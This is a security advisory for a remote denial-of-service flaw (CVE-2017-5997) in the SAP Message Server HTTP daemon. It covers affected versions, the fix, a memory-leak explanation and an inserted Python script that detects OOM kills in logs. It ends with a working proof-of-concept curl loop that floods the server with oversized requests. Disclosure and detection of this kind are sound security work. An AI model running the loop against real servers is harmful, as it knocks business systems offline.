ERPScan advisory ERPSCAN-16-038

SAP Message Server HTTP remote DoS

Published: Aug 18, 2016
Source: erpscan.io

EPSS: 0.003 (percentile 66.3%)

Application: SAP KERNEL
Versions Affected: SAP KERNEL 7.21-7.49
Vendor URL: SAP
Bugs: Denial of Service
Reported: 18.08.2016
Vendor response: 19.08.2016
Date of Public Advisory: 08.11.2016
Reference: SAP Security Note 2358972
Author: Mathieu Geli (ERPScan)

VULNERABILITY INFORMATION

Class: Denial of service
Impact: direct impact on availability
Remotely Exploitable: yes
Locally Exploitable: no

CVSS Information

CVE-2017-5997
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality None (N)
I: Impact to Integrity None (N)
A: Impact to Availability High (H)

Description

The SAP Message Server HTTP daemon doesn’t clean its memory upon client connections in a certain case.

Business risk

An attacker can exploit a Denial of Service vulnerability to terminate a process of the vulnerable component. Nobody will then be able to use the service, which in turn disrupts business processes, causes system downtime, and damages the business reputation of the victim company.

VULNERABLE PACKAGES

KERNEL 7.21
KERNEL 7.42
KRNL32NUC 7.21
KRNL32NUC 7.21EXT
KRNL32NUC 7.22
KRNL32NUC 7.22EXT
KRNL32UC 7.21
KRNL32UC 7.21EXT
KRNL32UC 7.22
KRNL32UC 7.22EXT
KRNL64NUC 7.21
KRNL64NUC 7.21EXT
KRNL64NUC 7.22
KRNL64NUC 7.22EXT
KRNL64NUC 7.42
KRNL64UC 7.21
KRNL64UC 7.21EXT
KRNL64UC 7.22
KRNL64UC 7.22EXT
KRNL64UC 7.42

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2358972.

TECHNICAL DESCRIPTION

The message server does not properly free the resources allocated to handle a client request when the request size is between 4k and 65k. In this special case the server answers with an empty reply, whereas for a request larger than 65k it resets the connection. Because the allocation for each such request is never released, memory use grows until the kernel OOM killer terminates the process. The following log shows the msgserver process being killed because too much memory had been allocated:

[4721576.189056] Out of memory: Kill process 14223 (ms.sapJ45_SCS01) score 243 or sacrifice child
[4721576.189058] Killed process 14223 (ms.sapJ45_SCS01) total-vm:3321508kB, anon-rss:2468184kB, file-rss:0kB
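As an added example (not part of the advisory), the following Python detection parses kernel OOM-killer lines of the form shown above and raises an alert whenever the killed process is an SAP message server (ms.sap<SID>_<instance>); the sample log, the RSS threshold and the process-name pattern are assumptions made for this example.

```python
import re
from typing import Dict, List

# Kernel OOM-killer lines in the format quoted in the advisory (dmesg / kern.log).
# Constructed sample: the java lines are filler, the ms.sap lines mirror the advisory.
SAMPLE_LOG = """\
[4721570.001000] Out of memory: Kill process 9911 (java) score 120 or sacrifice child
[4721570.001002] Killed process 9911 (java) total-vm:1048576kB, anon-rss:524288kB, file-rss:0kB
[4721576.189056] Out of memory: Kill process 14223 (ms.sapJ45_SCS01) score 243 or sacrifice child
[4721576.189058] Killed process 14223 (ms.sapJ45_SCS01) total-vm:3321508kB, anon-rss:2468184kB, file-rss:0kB
"""

KILLED_RE = re.compile(
    r"\[(?P<ts>[\d.]+)\] Killed process (?P<pid>\d+) \((?P<comm>[^)]+)\) "
    r"total-vm:(?P<vm>\d+)kB, anon-rss:(?P<rss>\d+)kB"
)
# Assumed naming: SAP message server binaries are ms.sap<SID>_<instance>, e.g. ms.sapJ45_SCS01.
MSGSERVER_RE = re.compile(r"^ms\.sap(?P<sid>[A-Z0-9]{3})_")

def parse_oom_kills(log_text: str) -> List[Dict]:
    """One record per 'Killed process' line: pid, command name, memory at kill time."""
    kills = []
    for line in log_text.splitlines():
        m = KILLED_RE.search(line)
        if m:
            kills.append({"ts": float(m["ts"]), "pid": int(m["pid"]), "comm": m["comm"],
                          "total_vm_kb": int(m["vm"]), "anon_rss_kb": int(m["rss"])})
    return kills

def msgserver_oom_alerts(log_text: str, rss_threshold_kb: int = 1_000_000) -> List[str]:
    """Alert on OOM kills of SAP message server processes. A large anonymous RSS at
    kill time is consistent with the leak described above (memory grows with each
    mid-sized HTTP request and is never released)."""
    alerts = []
    for k in parse_oom_kills(log_text):
        m = MSGSERVER_RE.match(k["comm"])
        if not m:
            continue  # OOM kills of other processes are not this advisory's signal
        severity = "HIGH" if k["anon_rss_kb"] >= rss_threshold_kb else "MEDIUM"
        alerts.append(
            f"{severity}: message server {k['comm']} (SID {m['sid']}, pid {k['pid']}) "
            f"OOM-killed with anon-rss {k['anon_rss_kb'] // 1024} MB; "
            "verify SAP Security Note 2358972 is applied"
        )
    return alerts

if __name__ == "__main__":
    for a in msgserver_oom_alerts(SAMPLE_LOG):
        print(a)
```

Feed it the host's kern.log or `dmesg` output; repeated alerts for the same SID between restarts are the pattern to escalate.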

Proof of Concept

while true; do
curl <ipmsserver>:<porthttpms>/msgserver/group?group=$(python -c "print 'A'*65000")
done
